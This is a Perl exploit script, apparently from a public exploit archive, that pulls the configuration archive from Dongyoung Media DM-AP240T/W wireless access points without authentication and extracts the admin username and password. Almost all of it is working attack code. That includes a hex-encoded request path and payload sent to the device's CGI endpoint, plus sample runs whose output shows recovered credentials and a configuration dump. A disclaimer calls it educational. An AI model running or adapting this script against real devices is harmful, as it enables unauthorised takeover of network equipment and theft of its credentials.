Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure

`#!/usr/bin/perl -w  
#  
# Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure  
#  
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>  
#  
#  
# Disclaimer:  
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.   
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages   
# caused by direct or indirect use of the information or functionality provided by these programs.   
# The author or any Internet provider bears NO responsibility for content or misuse of these programs   
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,   
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's   
# responsibility.  
#   
# Use them at your own risk!   
#   
# (Dont do anything without permissions)  
#  
#  
# PASSWORD DISCLOSURE, TEST:  
#  
# # [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080  
# # [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure  
# # [ =================================================================================  
# # [ Exploit Author: Todor Donev 2019 <[email protected]>  
# # [ Initializing the browser  
# # [ >> Referer => http://192.168.1.102  
# # [ >> User-Agent => Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2  
# # [ >> Content-Type => application/x-www-form-urlencoded  
# # [ << Connection => close  
# # [ << Accept-Ranges => bytes  
# # [ << Content-Length => 33412  
# # [ << Content-Type => application/octet-stream  
# # [ << Client-Date => Thu, 03 Oct 2019 10:41:05 GMT  
# # [ << Client-Peer => 192.168.1.102:8080  
# # [ << Client-Response-Num => 1  
# # [ << Content-Disposition => attachment;filename="config.tgz"  
# # [ << Content-Transfer-Encoding => binary  
# # [ << Set-Cookie => QSESSIONID=ea4bfb8c9455d441efefc531841d7459; path=/  
# # [   
# # [ Admin User : ktroot  
# # [ Admin Pass : 1234567890  
# # [test@localhost ~]$   
#  
#  
# CONFIGURATION DUMP, TEST:  
#  
# # [test@localhost ~]$ perl dm-ap240t.pl http://192.168.1.102:8080 show | head  
# # [ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure  
# # [ =================================================================================  
# # [ Exploit Author: Todor Donev 2019 <[email protected]>  
# # [ Initializing the browser  
# # [ >> Referer => http://192.168.1.102  
# # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.0 (like Gecko)  
# # [ >> Content-Type => application/x-www-form-urlencoded  
# # [ << Connection => close  
# # [ << Accept-Ranges => bytes  
# # [ << Content-Length => 33415  
# # [ << Content-Type => application/octet-stream  
# # [ << Client-Date => Thu, 03 Oct 2019 10:15:16 GMT  
# # [ << Client-Peer => 192.168.1.102:8080  
# # [ << Client-Response-Num => 1  
# # [ << Content-Disposition => attachment;filename="config.tgz"  
# # [ << Content-Transfer-Encoding => binary  
# # [ << Set-Cookie => QSESSIONID=34f95926faa74a38c4bf527c2545e816; path=/  
# # [  
# # [ >> Configuration dump...  
# # [  
# # [ ./config/0000755000000000000000000000000013545344507011170 5ustar rootroot./config/hostapd_open_ath11.conf0000644000000000000000000000060400000000012015452 0ustar rootrootignore_file_errors=1  
# # [ logger_syslog=-1  
# # [ logger_syslog_level=2  
# # [ logger_stdout=-1  
# # [ logger_stdout_level=2  
# # [ debug=0  
# # [ ctrl_interface=/var/run/hostapd  
# # [ ctrl_interface_group=0  
# # [ ssid=ATH11  
# # [ ignore_broadcast_ssid=0  
# # [test@localhost ~]$   
#  
#   
use strict;  
use HTTP::Request;  
use LWP::UserAgent;  
use WWW::UserAgent::Random;  
use Gzip::Faster;  
my $host = shift || ''; # Full path url to the store  
my $cmd = shift || ''; # show - Show configuration dump  
$host =~ s/\/$//;  
print "\033[2J"; #clear the screen  
print "\033[0;0H"; #jump to 0,0  
print STDERR "[ Dongyoung Media DM-AP240T/W Wireless Access Point Remote Configuration Disclosure\n";  
print STDERR "[ =================================================================================\n";  
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";  
if ($host !~ m/^http/){   
print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";  
print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";  
exit;  
}  
print STDERR "[ Initializing the browser\n";  
my $user_agent = rand_ua("browsers");  
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });  
$browser->timeout(30);  
$browser->agent($user_agent);  
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x5f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67";  
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";  
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);   
my $response = $browser->request($request) or die "[ Exploit Failed: $!";  
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;  
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;  
my $gzipped = $response->content();  
my $config = gunzip($gzipped);  
print STDERR "[ \n";  
if ($cmd =~ /show/) {  
print STDERR "[ >> Configuration dump...\n[\n";  
print "[ ", $_, "\n" for split(/\n/,$config);  
exit;  
} else {  
print "[ Admin User : ", $1, "\n" if($config =~ /ROOT_ID=(.*)/);  
print "[ Admin Pass : ", $1, "\n" if($config =~ /ROOT_PW=(.*)/);  
exit;  
}  
`